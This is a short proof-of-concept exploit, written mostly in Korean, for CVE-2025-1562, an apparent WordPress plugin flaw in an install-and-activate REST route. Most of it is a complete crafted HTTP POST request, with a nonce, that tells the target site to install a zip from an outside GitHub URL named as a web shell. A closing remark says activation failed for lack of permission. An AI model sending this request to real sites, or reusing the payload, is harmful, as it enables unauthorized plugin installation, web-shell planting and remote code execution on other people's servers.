
조작된 REST API 요청을 통해 원격 코드 실행을 허용하는 WordPress 플러그인 활성화 취약점인 CVE-2025-1562에 대한 개념 증명 익스플로잇입니다.
POST /index.php?rest_route=%2Fautonami-app%2Fplugin%2Finstall_and_activate&bwf-nonce=0f2449cddf9a7d692627071cfdef9ecf HTTP/2
Host: wp.192.168.31.110.nip.io
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: application/json
Content-Type: application/json
Content-Length: 117
{
"action": "install",
"url": "https://github.com/maximo896/webshell-example/raw/refs/heads/main/suffer.zip"
}
권한이 없어 플러그인을 활성화할 수 없으며, 플러그인 경로를 직접 가져올 수 없어 공격이 어렵습니다. unable to activate evil plugin, unable to retrieve the plugin path, difficult to attach